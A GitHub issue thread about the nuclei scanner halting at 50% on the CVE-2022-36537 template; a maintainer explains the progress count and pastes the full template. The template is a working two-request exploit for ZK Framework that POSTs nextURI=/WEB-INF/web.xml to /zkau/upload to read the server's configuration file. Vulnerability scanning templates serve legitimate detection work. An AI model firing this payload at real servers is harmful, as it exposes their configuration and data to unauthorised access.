### ISSUE TITLE
Scan stopping at 50% - CVE-2022-36537

### ISSUE THREAD

**Issue by hakrishi** [projectdiscovery/nuclei#3384]
Hey 👋

Was not sure whether to post this issue in the nuclei-templates repo or this one. 

### Current Behavior:
A scan using template CVE-2022-36537 with 56k hosts terminates at 50%. I have tried different scan strategies like host-spray, -stream, bulk size and concurrency but no luck.

### Expected Behavior:
Scan to continue past 50%

### Steps To Reproduce:
Run a regular scan with 56k hosts against the template (CVE-2022-36537), the command I used was:
`nuclei -l list.txt -t CVE-2022-36537.yaml -o output.txt -stream -c 200 -bs 20 -ss host-spray`

Also tried with a standard scan:
`nuclei -l list.txt -t CVE-2022-36537.yaml -o output.txt`

Thanks

Rishi

**Comment by hakrishi** [comment]
Issue also occurs at 5k and 20k hosts too.

**Comment by tarunKoyalwar** [comment]
@hakrishi if possible can you share errors from `-elog errors.txt` file . It contains all errors encountered by nuclei

**Comment by hakrishi** [comment]
I wouldn't be comfortable sharing that file as it contains some of the hosts I'm scanning. Are you able to replicate this issue on your end? I've tried it on a few of my systems, all which different specs and on different networks and have the same issue.

**Comment by tarunKoyalwar** [comment]
@hakrishi  this is expected because if you take a look at template. you will see that two requests are sent in this exploit and second request is only sent after extracting variable from first request response and if target is not vulnerable and variable is empty nuclei skips sending the second request 

nuclei stats are based on number of outgoing requests hence nuclei estimated 10k requests would be sent based on template and no of targets  but since none of them are vulnerable nuclei skips sending 2nd requests hence only 5k requests are sent and it shows 50% progress.

I hope this makes sense
```yaml
id: CVE-2022-36537

info:
  name: ZK Framework - Information Disclosure
  author: theamanrawat
  severity: high
  description: |
        ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://github.com/Malwareman007/CVE-2022-36537/
    - https://tracker.zkoss.org/browse/ZK-5150
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36537
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36537
    cwe-id: CWE-200
  metadata:
    shodan-query: http.title:"Server backup manager"
    verified: "true"
  tags: cve,cve2022,zk-framework,exposure,unauth

requests:
  - raw:
      - |
        GET /login.zul HTTP/1.1
        Host: {{Hostname}}        

      - |
        POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp
        Content-Length: 154

        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp
        Content-Disposition: form-data; name="nextURI"

        /WEB-INF/web.xml
        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp--        

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "<display-name>.*</display-name>"
          - "<welcome-file-list>((.|\n)*)welcome-file-list>"
          - "xml version"
          - "web-app"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: dtid
        group: 1
        regex:
          - "dt:'(.*?)',cu:"
        internal: true

# Enhanced by md on 2023/02/03


```
